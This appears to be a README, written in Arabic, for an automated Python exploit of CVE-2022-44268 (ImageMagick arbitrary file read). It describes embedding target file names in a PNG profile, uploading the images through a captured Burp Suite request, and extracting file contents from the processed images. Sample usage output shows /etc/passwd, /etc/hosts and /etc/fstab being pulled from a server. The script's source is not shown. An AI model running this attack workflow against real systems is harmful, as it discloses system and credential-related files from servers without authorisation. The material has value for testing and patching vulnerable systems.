
نص برمجي آلي بلغة Python يستخدم cve-2022-44268 لإضافة قيمة profile تحمل اسم ملف من قائمة ملفات مُدخلة إلى ملف مُدخل، وتحديث عملية رفع الصورة باستخدام ملف request.req مُدخل من Burpsuite (مرفق بالفعل) لرفع كل صورة معدَّلة، ثم تنزيل الصور المُعادة من الرابط المُعاد واستخراج محتوى الملف (filecontent) ووضعه في دليل مُدخل.
$ ./cve-2022-44268.py
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir
$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab